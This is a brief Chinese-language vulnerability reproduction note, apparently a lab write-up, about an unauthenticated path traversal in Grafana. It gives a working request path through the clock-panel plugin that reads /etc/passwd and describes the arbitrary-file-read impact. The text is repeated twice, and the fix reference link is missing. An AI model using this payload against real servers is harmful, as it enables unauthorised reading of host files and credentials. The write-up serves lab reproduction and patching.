前言:
Grafana是一个跨平台的开源的度量分析和可视化工具,可以通过将采集的数据查询然后可视化的展示,并及时通知。
漏洞复现:
打开靶场环境
http://ip:3000/login
直接访问地址,抓包插入payload:
/public/plugins/grafana-clock-panel/../../../../../../etc/passwd
漏洞危害
攻击者可通过该漏洞在未经身份验证的情况下读取主机上的任意文件。
具体修复方式详情参考链接:
前言:
Grafana是一个跨平台的开源的度量分析和可视化工具,可以通过将采集的数据查询然后可视化的展示,并及时通知。
漏洞复现:
打开靶场环境
http://ip:3000/login
直接访问地址,抓包插入payload:
/public/plugins/grafana-clock-panel/../../../../../../etc/passwd
漏洞危害
攻击者可通过该漏洞在未经身份验证的情况下读取主机上的任意文件。
具体修复方式详情参考链接: